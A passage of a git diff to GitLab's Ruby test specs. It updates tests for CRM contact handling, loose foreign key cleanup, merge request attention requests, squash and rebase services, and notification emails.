end context 'remove' do - let(:params) { { remove_crm_contact_ids: [contacts[0].id] } } + let(:params) { { remove_ids: [contacts[0].id] } } + + it 'updates the issue with correct contacts' do + response = set_crm_contacts + + expect(response).to be_success + expect(issue.customer_relations_contacts).to match_array([contacts[1]]) + end + end + + context 'remove by email' do + let(:params) { { remove_emails: [contacts[0].email] } } it 'updates the issue with 
correct contacts' do response = set_crm_contacts @@ -100,18 +122,18 @@ RSpec.describe Issues::SetCrmContactsService do context 'when attempting to add more than 6' do let(:id) { contacts[0].id } - let(:params) { { add_crm_contact_ids: [id, id, id, id, id, id, id] } } + let(:params) { { add_ids: [id, id, id, id, id, id, id] } } it 'returns expected error message' do response = set_crm_contacts expect(response).to be_error - expect(response.message).to match_array(['You can only add up to 6 contacts at one time']) + expect(response.message).to eq('You can only add up to 6 contacts at one time') end end context 'when trying to remove non-existent contact' do - let(:params) { { remove_crm_contact_ids: [non_existing_record_id] } } + let(:params) { { remove_ids: [non_existing_record_id] } } it 'returns expected error message' do response = set_crm_contacts @@ -122,10 +144,10 @@ RSpec.describe Issues::SetCrmContactsService do end context 'when combining params' do - let(:error_invalid_params) { 'You cannot combine crm_contact_ids with add_crm_contact_ids or remove_crm_contact_ids' } + let(:error_invalid_params) { 'You cannot combine replace_ids with add_ids or remove_ids' } context 'add and remove' do - let(:params) { { remove_crm_contact_ids: [contacts[1].id], add_crm_contact_ids: [contacts[3].id] } } + let(:params) { { remove_ids: [contacts[1].id], add_ids: [contacts[3].id] } } it 'updates the issue with correct contacts' do response = set_crm_contacts @@ -136,27 +158,57 @@ RSpec.describe Issues::SetCrmContactsService do end context 'replace and remove' do - let(:params) { { crm_contact_ids: [contacts[3].id], remove_crm_contact_ids: [contacts[0].id] } } + let(:params) { { replace_ids: [contacts[3].id], remove_ids: [contacts[0].id] } } it 'returns expected error response' do response = set_crm_contacts expect(response).to be_error - expect(response.message).to match_array([error_invalid_params]) + expect(response.message).to eq(error_invalid_params) end end context 
'replace and add' do - let(:params) { { crm_contact_ids: [contacts[3].id], add_crm_contact_ids: [contacts[1].id] } } + let(:params) { { replace_ids: [contacts[3].id], add_ids: [contacts[1].id] } } it 'returns expected error response' do response = set_crm_contacts expect(response).to be_error - expect(response.message).to match_array([error_invalid_params]) + expect(response.message).to eq(error_invalid_params) end end end + + context 'when trying to add an existing issue contact' do + let(:params) { { add_ids: [contacts[0].id] } } + + it 'does not return an error' do + response = set_crm_contacts + + expect(response).to be_success + end + end + + context 'when trying to add the same contact twice' do + let(:params) { { add_ids: [contacts[3].id, contacts[3].id] } } + + it 'does not return an error' do + response = set_crm_contacts + + expect(response).to be_success + end + end + + context 'when trying to remove a contact not attached to the issue' do + let(:params) { { remove_ids: [contacts[3].id] } } + + it 'does not return an error' do + response = set_crm_contacts + + expect(response).to be_success + end + end end end end diff --git a/spec/services/issues/update_service_spec.rb b/spec/services/issues/update_service_spec.rb index 85b8fef685e..4739b7e0f28 100644 --- a/spec/services/issues/update_service_spec.rb +++ b/spec/services/issues/update_service_spec.rb @@ -29,6 +29,8 @@ RSpec.describe Issues::UpdateService, :mailer do end describe 'execute' do + let_it_be(:contact) { create(:contact, group: group) } + def find_note(starting_with) issue.notes.find do |note| note && note.note.start_with?(starting_with) @@ -57,7 +59,8 @@ RSpec.describe Issues::UpdateService, :mailer do due_date: Date.tomorrow, discussion_locked: true, severity: 'low', - milestone_id: milestone.id + milestone_id: milestone.id, + add_contacts: [contact.email] } end @@ -76,6 +79,7 @@ RSpec.describe Issues::UpdateService, :mailer do expect(issue.discussion_locked).to be_truthy 
expect(issue.confidential).to be_falsey expect(issue.milestone).to eq milestone + expect(issue.issue_customer_relations_contacts.last.contact).to eq contact end it 'updates issue milestone when passing `milestone` param' do @@ -319,7 +323,7 @@ RSpec.describe Issues::UpdateService, :mailer do opts[:move_between_ids] = [issue1.id, issue2.id] - expect(IssueRebalancingWorker).not_to receive(:perform_async) + expect(Issues::RebalancingWorker).not_to receive(:perform_async) update_issue(opts) expect(issue.relative_position).to be_between(issue1.relative_position, issue2.relative_position) @@ -335,7 +339,7 @@ RSpec.describe Issues::UpdateService, :mailer do opts[:move_between_ids] = [issue1.id, issue2.id] - expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, nil, project.root_namespace.id) + expect(Issues::RebalancingWorker).to receive(:perform_async).with(nil, nil, project.root_namespace.id) update_issue(opts) expect(issue.relative_position).to be_between(issue1.relative_position, issue2.relative_position) @@ -349,7 +353,7 @@ RSpec.describe Issues::UpdateService, :mailer do opts[:move_between_ids] = [issue1.id, issue2.id] - expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, nil, project.root_namespace.id) + expect(Issues::RebalancingWorker).to receive(:perform_async).with(nil, nil, project.root_namespace.id) update_issue(opts) expect(issue.relative_position).to be_between(issue1.relative_position, issue2.relative_position) @@ -363,7 +367,7 @@ RSpec.describe Issues::UpdateService, :mailer do opts[:move_between_ids] = [issue1.id, issue2.id] - expect(IssueRebalancingWorker).to receive(:perform_async).with(nil, nil, project.root_namespace.id) + expect(Issues::RebalancingWorker).to receive(:perform_async).with(nil, nil, project.root_namespace.id) update_issue(opts) expect(issue.relative_position).to be_between(issue1.relative_position, issue2.relative_position) diff --git a/spec/services/loose_foreign_keys/batch_cleaner_service_spec.rb 
b/spec/services/loose_foreign_keys/batch_cleaner_service_spec.rb index bdb3d0f6700..d3d57ea2444 100644 --- a/spec/services/loose_foreign_keys/batch_cleaner_service_spec.rb +++ b/spec/services/loose_foreign_keys/batch_cleaner_service_spec.rb @@ -21,33 +21,34 @@ RSpec.describe LooseForeignKeys::BatchCleanerService do migration.track_record_deletions(:_test_loose_fk_parent_table) end - let(:parent_model) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_parent_table' - - include LooseForeignKey - - loose_foreign_key :_test_loose_fk_child_table_1, :parent_id, on_delete: :async_delete - loose_foreign_key :_test_loose_fk_child_table_2, :parent_id_with_different_column, on_delete: :async_nullify - end - end - - let(:child_model_1) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_child_table_1' - end - end - - let(:child_model_2) do - Class.new(ApplicationRecord) do - self.table_name = '_test_loose_fk_child_table_2' - end + let(:loose_foreign_key_definitions) do + [ + ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new( + '_test_loose_fk_child_table_1', + '_test_loose_fk_parent_table', + { + column: 'parent_id', + on_delete: :async_delete, + gitlab_schema: :gitlab_main + } + ), + ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new( + '_test_loose_fk_child_table_2', + '_test_loose_fk_parent_table', + { + column: 'parent_id_with_different_column', + on_delete: :async_nullify, + gitlab_schema: :gitlab_main + } + ) + ] end + let(:loose_fk_parent_table) { table(:_test_loose_fk_parent_table) } let(:loose_fk_child_table_1) { table(:_test_loose_fk_child_table_1) } let(:loose_fk_child_table_2) { table(:_test_loose_fk_child_table_2) } - let(:parent_record_1) { parent_model.create! } - let(:other_parent_record) { parent_model.create! } + let(:parent_record_1) { loose_fk_parent_table.create! } + let(:other_parent_record) { loose_fk_parent_table.create! 
} before(:all) do create_table_structure @@ -87,12 +88,10 @@ RSpec.describe LooseForeignKeys::BatchCleanerService do expect(loose_fk_child_table_1.count).to eq(4) expect(loose_fk_child_table_2.count).to eq(4) - described_class.new(parent_klass: parent_model, - deleted_parent_records: LooseForeignKeys::DeletedRecord.status_pending.all, - models_by_table_name: { - '_test_loose_fk_child_table_1' => child_model_1, - '_test_loose_fk_child_table_2' => child_model_2 - }).execute + described_class.new(parent_table: '_test_loose_fk_parent_table', + loose_foreign_key_definitions: loose_foreign_key_definitions, + deleted_parent_records: LooseForeignKeys::DeletedRecord.load_batch_for_table('public._test_loose_fk_parent_table', 100) + ).execute end it 'cleans up the child records' do @@ -108,7 +107,7 @@ RSpec.describe LooseForeignKeys::BatchCleanerService do it 'records the DeletedRecord status updates', :prometheus do counter = Gitlab::Metrics.registry.get(:loose_foreign_key_processed_deleted_records) - expect(counter.get(table: parent_model.table_name, db_config_name: 'main')).to eq(1) + expect(counter.get(table: loose_fk_parent_table.table_name, db_config_name: 'main')).to eq(1) end it 'does not delete unrelated records' do diff --git a/spec/services/loose_foreign_keys/cleaner_service_spec.rb b/spec/services/loose_foreign_keys/cleaner_service_spec.rb index 6f37ac49435..2cfd8385953 100644 --- a/spec/services/loose_foreign_keys/cleaner_service_spec.rb +++ b/spec/services/loose_foreign_keys/cleaner_service_spec.rb @@ -13,21 +13,21 @@ RSpec.describe LooseForeignKeys::CleanerService do let(:loose_fk_definition) do ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new( - 'projects', 'issues', + 'projects', { column: 'project_id', - on_delete: :async_nullify + on_delete: :async_nullify, + gitlab_schema: :gitlab_main } ) end subject(:cleaner_service) do described_class.new( - model: Issue, - foreign_key_definition: loose_fk_definition, - deleted_parent_records: deleted_records 
- ) + loose_foreign_key_definition: loose_fk_definition, + connection: ApplicationRecord.connection, + deleted_parent_records: deleted_records) end context 'when invalid foreign key definition is passed' do @@ -80,11 +80,12 @@ RSpec.describe LooseForeignKeys::CleanerService do let(:loose_fk_definition) do ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new( - 'users', 'project_authorizations', + 'users', { column: 'user_id', - on_delete: :async_delete + on_delete: :async_delete, + gitlab_schema: :gitlab_main } ) end @@ -97,8 +98,8 @@ RSpec.describe LooseForeignKeys::CleanerService do subject(:cleaner_service) do described_class.new( - model: ProjectAuthorization, - foreign_key_definition: loose_fk_definition, + loose_foreign_key_definition: loose_fk_definition, + connection: ApplicationRecord.connection, deleted_parent_records: deleted_records ) end @@ -130,8 +131,8 @@ RSpec.describe LooseForeignKeys::CleanerService do context 'when with_skip_locked parameter is true' do subject(:cleaner_service) do described_class.new( - model: Issue, - foreign_key_definition: loose_fk_definition, + loose_foreign_key_definition: loose_fk_definition, + connection: ApplicationRecord.connection, deleted_parent_records: deleted_records, with_skip_locked: true ) diff --git a/spec/services/members/create_service_spec.rb b/spec/services/members/create_service_spec.rb index fe866d73215..13f56fe7458 100644 --- a/spec/services/members/create_service_spec.rb +++ b/spec/services/members/create_service_spec.rb @@ -127,85 +127,11 @@ RSpec.describe Members::CreateService, :aggregate_failures, :clean_gitlab_redis_ end end - context 'when tracking the areas of focus', :snowplow do - context 'when areas_of_focus is not passed' do - it 'does not track' do - execute_service - - expect_no_snowplow_event(category: described_class.name, action: 'area_of_focus') - end - end - - context 'when 1 areas_of_focus is passed' do - let(:additional_params) { { invite_source: '_invite_source_', 
areas_of_focus: ['no_selection'] } } - - it 'tracks the areas_of_focus from params' do - execute_service - - expect_snowplow_event( - category: described_class.name, - action: 'area_of_focus', - label: 'no_selection', - property: source.members.last.id.to_s - ) - end - - context 'when passing many user ids' do - let(:another_user) { create(:user) } - let(:user_ids) { [member.id, another_user.id].join(',') } - - it 'tracks the areas_of_focus from params' do - execute_service - - members = source.members.last(2) - - expect_snowplow_event( - category: described_class.name, - action: 'area_of_focus', - label: 'no_selection', - property: members.first.id.to_s - ) - expect_snowplow_event( - category: described_class.name, - action: 'area_of_focus', - label: 'no_selection', - property: members.last.id.to_s - ) - end - end - end - - context 'when multiple areas_of_focus are passed' do - let(:additional_params) { { invite_source: '_invite_source_', areas_of_focus: %w[no_selection Other] } } - - it 'tracks the areas_of_focus from params' do - execute_service - - expect_snowplow_event( - category: described_class.name, - action: 'area_of_focus', - label: 'no_selection', - property: source.members.last.id.to_s - ) - expect_snowplow_event( - category: described_class.name, - action: 'area_of_focus', - label: 'Other', - property: source.members.last.id.to_s - ) - end - end - end - context 'when assigning tasks to be done' do let(:additional_params) do { invite_source: '_invite_source_', tasks_to_be_done: %w(ci code), tasks_project_id: source.id } end - before do - stub_experiments(invite_members_for_task: true) - end - it 'creates 2 task issues', :aggregate_failures do expect(TasksToBeDone::CreateWorker) .to receive(:perform_async) diff --git a/spec/services/merge_requests/after_create_service_spec.rb b/spec/services/merge_requests/after_create_service_spec.rb index cbbd193a411..781be57d709 100644 --- a/spec/services/merge_requests/after_create_service_spec.rb +++ 
b/spec/services/merge_requests/after_create_service_spec.rb @@ -85,13 +85,67 @@ RSpec.describe MergeRequests::AfterCreateService do context 'when merge request is in preparing state' do before do + merge_request.mark_as_unchecked! unless merge_request.unchecked? merge_request.mark_as_preparing! - execute_service end it 'marks the merge request as unchecked' do + execute_service + expect(merge_request.reload).to be_unchecked end + + context 'when preparing for mergeability fails' do + before do + # This is only one of the possible cases that can fail. This is to + # simulate a failure that happens during the service call. + allow(merge_request) + .to receive(:update_head_pipeline) + .and_raise(StandardError) + end + + it 'does not mark the merge request as unchecked' do + expect { execute_service }.to raise_error(StandardError) + expect(merge_request.reload).to be_preparing + end + + context 'when early_prepare_for_mergeability feature flag is disabled' do + before do + stub_feature_flags(early_prepare_for_mergeability: false) + end + + it 'does not mark the merge request as unchecked' do + expect { execute_service }.to raise_error(StandardError) + expect(merge_request.reload).to be_preparing + end + end + end + + context 'when preparing merge request fails' do + before do + # This is only one of the possible cases that can fail. This is to + # simulate a failure that happens during the service call. 
+ allow(merge_request) + .to receive_message_chain(:diffs, :write_cache) + .and_raise(StandardError) + end + + it 'still marks the merge request as unchecked' do + expect { execute_service }.to raise_error(StandardError) + expect(merge_request.reload).to be_unchecked + end + + context 'when early_prepare_for_mergeability feature flag is disabled' do + before do + stub_feature_flags(early_prepare_for_mergeability: false) + end + + it 'does not mark the merge request as unchecked' do + expect { execute_service }.to raise_error(StandardError) + expect(merge_request.reload).to be_preparing + end + end + end end it 'increments the usage data counter of create event' do diff --git a/spec/services/merge_requests/approval_service_spec.rb b/spec/services/merge_requests/approval_service_spec.rb index d30b2721a36..4d20d62b864 100644 --- a/spec/services/merge_requests/approval_service_spec.rb +++ b/spec/services/merge_requests/approval_service_spec.rb @@ -5,7 +5,7 @@ require 'spec_helper' RSpec.describe MergeRequests::ApprovalService do describe '#execute' do let(:user) { create(:user) } - let(:merge_request) { create(:merge_request) } + let(:merge_request) { create(:merge_request, reviewers: [user]) } let(:project) { merge_request.project } let!(:todo) { create(:todo, user: user, project: project, target: merge_request) } @@ -59,6 +59,14 @@ RSpec.describe MergeRequests::ApprovalService do service.execute(merge_request) end + it 'removes attention requested state' do + expect(MergeRequests::RemoveAttentionRequestedService).to receive(:new) + .with(project: project, current_user: user, merge_request: merge_request, user: user) + .and_call_original + + service.execute(merge_request) + end + context 'with remaining approvals' do it 'fires an approval webhook' do expect(service).to receive(:execute_hooks).with(merge_request, 'approved') diff --git a/spec/services/merge_requests/bulk_remove_attention_requested_service_spec.rb 
b/spec/services/merge_requests/bulk_remove_attention_requested_service_spec.rb new file mode 100644 index 00000000000..fe4ce0dab5e --- /dev/null +++ b/spec/services/merge_requests/bulk_remove_attention_requested_service_spec.rb @@ -0,0 +1,45 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe MergeRequests::BulkRemoveAttentionRequestedService do + let(:current_user) { create(:user) } + let(:user) { create(:user) } + let(:assignee_user) { create(:user) } + let(:merge_request) { create(:merge_request, reviewers: [user], assignees: [assignee_user]) } + let(:reviewer) { merge_request.find_reviewer(user) } + let(:assignee) { merge_request.find_assignee(assignee_user) } + let(:project) { merge_request.project } + let(:service) { described_class.new(project: project, current_user: current_user, merge_request: merge_request) } + let(:result) { service.execute } + + before do + project.add_developer(current_user) + project.add_developer(user) + end + + describe '#execute' do + context 'invalid permissions' do + let(:service) { described_class.new(project: project, current_user: create(:user), merge_request: merge_request) } + + it 'returns an error' do + expect(result[:status]).to eq :error + end + end + + context 'updates reviewers and assignees' do + it 'returns success' do + expect(result[:status]).to eq :success + end + + it 'updates reviewers state' do + service.execute + reviewer.reload + assignee.reload + + expect(reviewer.state).to eq 'reviewed' + expect(assignee.state).to eq 'reviewed' + end + end + end +end diff --git a/spec/services/merge_requests/close_service_spec.rb b/spec/services/merge_requests/close_service_spec.rb index 86d972bc516..d36a2f75cfe 100644 --- a/spec/services/merge_requests/close_service_spec.rb +++ b/spec/services/merge_requests/close_service_spec.rb @@ -54,6 +54,10 @@ RSpec.describe MergeRequests::CloseService do expect(todo.reload).to be_done end + it 'removes attention requested state' do + 
expect(merge_request.find_assignee(user2).attention_requested?).to eq(false) + end + context 'when auto merge is enabled' do let(:merge_request) { create(:merge_request, :merge_when_pipeline_succeeds) } diff --git a/spec/services/merge_requests/handle_assignees_change_service_spec.rb b/spec/services/merge_requests/handle_assignees_change_service_spec.rb index c43f5db6059..fa3b1614e21 100644 --- a/spec/services/merge_requests/handle_assignees_change_service_spec.rb +++ b/spec/services/merge_requests/handle_assignees_change_service_spec.rb @@ -87,6 +87,14 @@ RSpec.describe MergeRequests::HandleAssigneesChangeService do expect(todo).to be_pending end + it 'removes attention requested state' do + expect(MergeRequests::RemoveAttentionRequestedService).to receive(:new) + .with(project: project, current_user: user, merge_request: merge_request, user: user) + .and_call_original + + execute + end + it 'tracks users assigned event' do expect(Gitlab::UsageDataCounters::MergeRequestActivityUniqueCounter) .to receive(:track_users_assigned_to_mr).once.with(users: [assignee]) diff --git a/spec/services/merge_requests/merge_service_spec.rb b/spec/services/merge_requests/merge_service_spec.rb index e3f33304aab..127c94763d9 100644 --- a/spec/services/merge_requests/merge_service_spec.rb +++ b/spec/services/merge_requests/merge_service_spec.rb @@ -151,7 +151,7 @@ RSpec.describe MergeRequests::MergeService do it 'closes GitLab issue tracker issues' do issue = create :issue, project: project - commit = instance_double('commit', safe_message: "Fixes #{issue.to_reference}", date: Time.current, authored_date: Time.current) + commit = double('commit', safe_message: "Fixes #{issue.to_reference}", date: Time.current, authored_date: Time.current) allow(merge_request).to receive(:commits).and_return([commit]) merge_request.cache_merge_request_closes_issues! 
diff --git a/spec/services/merge_requests/merge_to_ref_service_spec.rb b/spec/services/merge_requests/merge_to_ref_service_spec.rb index 0a781aee704..19fac3b5095 100644 --- a/spec/services/merge_requests/merge_to_ref_service_spec.rb +++ b/spec/services/merge_requests/merge_to_ref_service_spec.rb @@ -150,7 +150,10 @@ RSpec.describe MergeRequests::MergeToRefService do merge_request.update!(squash: true) end - it_behaves_like 'MergeService for target ref' + it_behaves_like 'successfully merges to ref with merge method' do + let(:first_parent_ref) { 'refs/heads/master' } + let(:target_ref) { merge_request.merge_ref_path } + end it 'does not squash before merging' do expect(MergeRequests::SquashService).not_to receive(:new) diff --git a/spec/services/merge_requests/rebase_service_spec.rb b/spec/services/merge_requests/rebase_service_spec.rb index ca561376581..e671bbf2cd6 100644 --- a/spec/services/merge_requests/rebase_service_spec.rb +++ b/spec/services/merge_requests/rebase_service_spec.rb @@ -80,6 +80,27 @@ RSpec.describe MergeRequests::RebaseService do end end + context 'with a pre-receive failure' do + let(:pre_receive_error) { "Commit message does not follow the pattern 'ACME'" } + let(:merge_error) { "Something went wrong during the rebase pre-receive hook: #{pre_receive_error}." 
} + + before do + allow(repository).to receive(:gitaly_operation_client).and_raise(Gitlab::Git::PreReceiveError, "GitLab: #{pre_receive_error}") + end + + it 'saves a specific message' do + subject.execute(merge_request) + + expect(merge_request.reload.merge_error).to eq merge_error + end + + it 'returns an error' do + expect(service.execute(merge_request)).to match( + status: :error, + message: merge_error) + end + end + context 'with git command failure' do before do allow(repository).to receive(:gitaly_operation_client).and_raise(Gitlab::Git::Repository::GitError, 'Something went wrong') diff --git a/spec/services/merge_requests/remove_attention_requested_service_spec.rb b/spec/services/merge_requests/remove_attention_requested_service_spec.rb new file mode 100644 index 00000000000..875afc2dc7e --- /dev/null +++ b/spec/services/merge_requests/remove_attention_requested_service_spec.rb @@ -0,0 +1,85 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe MergeRequests::RemoveAttentionRequestedService do + let(:current_user) { create(:user) } + let(:user) { create(:user) } + let(:assignee_user) { create(:user) } + let(:merge_request) { create(:merge_request, reviewers: [user], assignees: [assignee_user]) } + let(:reviewer) { merge_request.find_reviewer(user) } + let(:assignee) { merge_request.find_assignee(assignee_user) } + let(:project) { merge_request.project } + let(:service) { described_class.new(project: project, current_user: current_user, merge_request: merge_request, user: user) } + let(:result) { service.execute } + + before do + project.add_developer(current_user) + project.add_developer(user) + end + + describe '#execute' do + context 'invalid permissions' do + let(:service) { described_class.new(project: project, current_user: create(:user), merge_request: merge_request, user: user) } + + it 'returns an error' do + expect(result[:status]).to eq :error + end + end + + context 'reviewer does not exist' do + let(:service) { 
described_class.new(project: project, current_user: current_user, merge_request: merge_request, user: create(:user)) } + + it 'returns an error' do + expect(result[:status]).to eq :error + end + end + + context 'reviewer exists' do + it 'returns success' do + expect(result[:status]).to eq :success + end + + it 'updates reviewers state' do + service.execute + reviewer.reload + + expect(reviewer.state).to eq 'reviewed' + end + end + + context 'assignee exists' do + let(:service) { described_class.new(project: project, current_user: current_user, merge_request: merge_request, user: assignee_user) } + + before do + assignee.update!(state: :reviewed) + end + + it 'returns success' do + expect(result[:status]).to eq :success + end + + it 'updates assignees state' do + service.execute + assignee.reload + + expect(assignee.state).to eq 'reviewed' + end + end + + context 'assignee is the same as reviewer' do + let(:merge_request) { create(:merge_request, reviewers: [user], assignees: [user]) } + let(:service) { described_class.new(project: project, current_user: current_user, merge_request: merge_request, user: user) } + let(:assignee) { merge_request.find_assignee(user) } + + it 'updates reviewers and assignees state' do + service.execute + reviewer.reload + assignee.reload + + expect(reviewer.state).to eq 'reviewed' + expect(assignee.state).to eq 'reviewed' + end + end + end +end diff --git a/spec/services/merge_requests/resolved_discussion_notification_service_spec.rb b/spec/services/merge_requests/resolved_discussion_notification_service_spec.rb index 74f3a1b06fc..2f191f2ee44 100644 --- a/spec/services/merge_requests/resolved_discussion_notification_service_spec.rb +++ b/spec/services/merge_requests/resolved_discussion_notification_service_spec.rb @@ -26,6 +26,12 @@ RSpec.describe MergeRequests::ResolvedDiscussionNotificationService do subject.execute(merge_request) end + + it "doesn't send a webhook" do + expect_any_instance_of(MergeRequests::BaseService).not_to 
receive(:execute_hooks) + + subject.execute(merge_request) + end end context "when all discussions are resolved" do @@ -44,6 +50,12 @@ RSpec.describe MergeRequests::ResolvedDiscussionNotificationService do subject.execute(merge_request) end + + it "sends a webhook" do + expect_any_instance_of(MergeRequests::BaseService).to receive(:execute_hooks).with(merge_request, 'update') + + subject.execute(merge_request) + end end end end diff --git a/spec/services/merge_requests/squash_service_spec.rb b/spec/services/merge_requests/squash_service_spec.rb index 09f83624e05..af48e8f5dae 100644 --- a/spec/services/merge_requests/squash_service_spec.rb +++ b/spec/services/merge_requests/squash_service_spec.rb @@ -55,18 +55,26 @@ RSpec.describe MergeRequests::SquashService do expect(merge_request).to receive(:commits_count).at_least(:once).and_return(1) end - it 'will skip performing the squash, as the outcome would be the same' do - expect(merge_request.target_project.repository).not_to receive(:squash) + it 'will still perform the squash' do + expect(merge_request.target_project.repository).to receive(:squash).and_return('sha') service.execute end - it 'will still perform the squash when a custom squash commit message has been provided' do - service = described_class.new(project: project, current_user: user, params: { merge_request: merge_request, squash_commit_message: 'A custom commit message' }) + context 'when squash message matches commit message' do + let(:service) { described_class.new(project: project, current_user: user, params: { merge_request: merge_request, squash_commit_message: merge_request.first_commit.safe_message }) } - expect(merge_request.target_project.repository).to receive(:squash).and_return('sha') + it 'returns that commit SHA' do + result = service.execute - service.execute + expect(result).to match(status: :success, squash_sha: merge_request.diff_head_sha) + end + + it 'does not perform any git actions' do + expect(repository).not_to receive(:squash) 
+ + service.execute + end end end @@ -113,17 +121,7 @@ RSpec.describe MergeRequests::SquashService do context 'when there is only one commit in the merge request' do let(:merge_request) { merge_request_with_one_commit } - it 'returns that commit SHA' do - result = service.execute - - expect(result).to match(status: :success, squash_sha: merge_request.diff_head_sha) - end - - it 'does not perform any git actions' do - expect(repository).not_to receive(:popen) - - service.execute - end + include_examples 'the squash succeeds' end context 'when squashing only new files' do diff --git a/spec/services/merge_requests/toggle_attention_requested_service_spec.rb b/spec/services/merge_requests/toggle_attention_requested_service_spec.rb index a26b1be529e..63fa61b8097 100644 --- a/spec/services/merge_requests/toggle_attention_requested_service_spec.rb +++ b/spec/services/merge_requests/toggle_attention_requested_service_spec.rb @@ -13,9 +13,14 @@ RSpec.describe MergeRequests::ToggleAttentionRequestedService do let(:service) { described_class.new(project: project, current_user: current_user, merge_request: merge_request, user: user) } let(:result) { service.execute } let(:todo_service) { spy('todo service') } + let(:notification_service) { spy('notification service') } before do + allow(NotificationService).to receive(:new) { notification_service } allow(service).to receive(:todo_service).and_return(todo_service) + allow(service).to receive(:notification_service).and_return(notification_service) + allow(SystemNoteService).to receive(:request_attention) + allow(SystemNoteService).to receive(:remove_attention_request) project.add_developer(current_user) project.add_developer(user) @@ -59,6 +64,20 @@ RSpec.describe MergeRequests::ToggleAttentionRequestedService do service.execute end + + it 'sends email to reviewer' do + expect(notification_service).to receive_message_chain(:async, :attention_requested_of_merge_request).with(merge_request, current_user, user) + + service.execute + 
end + + it 'removes attention requested state' do + expect(MergeRequests::RemoveAttentionRequestedService).to receive(:new) + .with(project: project, current_user: current_user, merge_request: merge_request, user: current_user) + .and_call_original + + service.execute + end end context 'assignee exists' do @@ -84,6 +103,20 @@ RSpec.describe MergeRequests::ToggleAttentionRequestedService do service.execute end + + it 'creates a request attention system note' do + expect(SystemNoteService).to receive(:request_attention).with(merge_request, merge_request.project, current_user, assignee_user) + + service.execute + end + + it 'removes attention requested state' do + expect(MergeRequests::RemoveAttentionRequestedService).to receive(:new) + .with(project: project, current_user: current_user, merge_request: merge_request, user: current_user) + .and_call_original + + service.execute + end end context 'assignee is the same as reviewer' do @@ -123,6 +156,12 @@ RSpec.describe MergeRequests::ToggleAttentionRequestedService do service.execute end + + it 'creates a remove attention request system note' do + expect(SystemNoteService).to receive(:remove_attention_request).with(merge_request, merge_request.project, current_user, user) + + service.execute + end end end end diff --git a/spec/services/notification_service_spec.rb b/spec/services/notification_service_spec.rb index fbf5b183365..24775ce06a4 100644 --- a/spec/services/notification_service_spec.rb +++ b/spec/services/notification_service_spec.rb @@ -2425,6 +2425,45 @@ RSpec.describe NotificationService, :mailer do let(:notification_trigger) { notification.review_requested_of_merge_request(merge_request, current_user, reviewer) } end end + + describe '#attention_requested_of_merge_request' do + let_it_be(:current_user) { create(:user) } + let_it_be(:reviewer) { create(:user) } + let_it_be(:merge_request) { create(:merge_request, source_project: project, reviewers: [reviewer]) } + + it 'sends email to reviewer', 
:aggregate_failures do + notification.attention_requested_of_merge_request(merge_request, current_user, reviewer) + + merge_request.reviewers.each { |reviewer| should_email(reviewer) } + should_not_email(merge_request.author) + should_not_email(@u_watcher) + should_not_email(@u_participant_mentioned) + should_not_email(@subscriber) + should_not_email(@watcher_and_subscriber) + should_not_email(@u_guest_watcher) + should_not_email(@u_guest_custom) + should_not_email(@u_custom_global) + should_not_email(@unsubscriber) + should_not_email(@u_participating) + should_not_email(@u_disabled) + should_not_email(@u_lazy_participant) + end + + it 'adds "attention requested" reason' do + notification.attention_requested_of_merge_request(merge_request, current_user, [reviewer]) + + merge_request.reviewers.each do |reviewer| + email = find_email_for(reviewer) + + expect(email).to have_header('X-GitLab-NotificationReason', NotificationReason::ATTENTION_REQUESTED) + end + end + + it_behaves_like 'project emails are disabled' do + let(:notification_target) { merge_request } + let(:notification_trigger) { notification.attention_requested_of_merge_request(merge_request, current_user, reviewer) } + end + end end describe 'Projects', :deliver_mails_inline do diff --git a/spec/services/packages/debian/update_distribution_service_spec.rb b/spec/services/packages/debian/update_distribution_service_spec.rb index 2aa34a62111..3dff2754cec 100644 --- a/spec/services/packages/debian/update_distribution_service_spec.rb +++ b/spec/services/packages/debian/update_distribution_service_spec.rb @@ -61,9 +61,9 @@ RSpec.describe Packages::Debian::UpdateDistributionService do let_it_be(:architecture0) { create("debian_#{container_type}_architecture", distribution: distribution, name: 'all') } let_it_be(:architecture1) { create("debian_#{container_type}_architecture", distribution: distribution, name: 'architecture1') } let_it_be(:architecture2) { create("debian_#{container_type}_architecture", 
distribution: distribution, name: 'architecture2') } - let_it_be(:component_file1) { create("debian_#{container_type}_component_file", :source, component: component1) } + let_it_be(:component_file1) { create("debian_#{container_type}_component_file", :sources, component: component1) } let_it_be(:component_file2) { create("debian_#{container_type}_component_file", component: component1, architecture: architecture1) } - let_it_be(:component_file3) { create("debian_#{container_type}_component_file", :source, component: component2) } + let_it_be(:component_file3) { create("debian_#{container_type}_component_file", :sources, component: component2) } let_it_be(:component_file4) { create("debian_#{container_type}_component_file", component: component2, architecture: architecture2) } let(:original_params) do diff --git a/spec/services/packages/npm/create_package_service_spec.rb b/spec/services/packages/npm/create_package_service_spec.rb index b1beb2adb3b..3bb675058df 100644 --- a/spec/services/packages/npm/create_package_service_spec.rb +++ b/spec/services/packages/npm/create_package_service_spec.rb @@ -89,17 +89,6 @@ RSpec.describe Packages::Npm::CreatePackageService do end end end - - context 'with packages_npm_abbreviated_metadata disabled' do - before do - stub_feature_flags(packages_npm_abbreviated_metadata: false) - end - - it 'creates a package without metadatum' do - expect { subject } - .not_to change { Packages::Npm::Metadatum.count } - end - end end describe '#execute' do diff --git a/spec/services/projects/destroy_service_spec.rb b/spec/services/projects/destroy_service_spec.rb index ac84614121a..b22f276ee1f 100644 --- a/spec/services/projects/destroy_service_spec.rb +++ b/spec/services/projects/destroy_service_spec.rb @@ -55,48 +55,16 @@ RSpec.describe Projects::DestroyService, :aggregate_failures do .and change { Ci::Pipeline.count }.by(-1) end - context 'with abort_deleted_project_pipelines disabled' do - stub_feature_flags(abort_deleted_project_pipelines: 
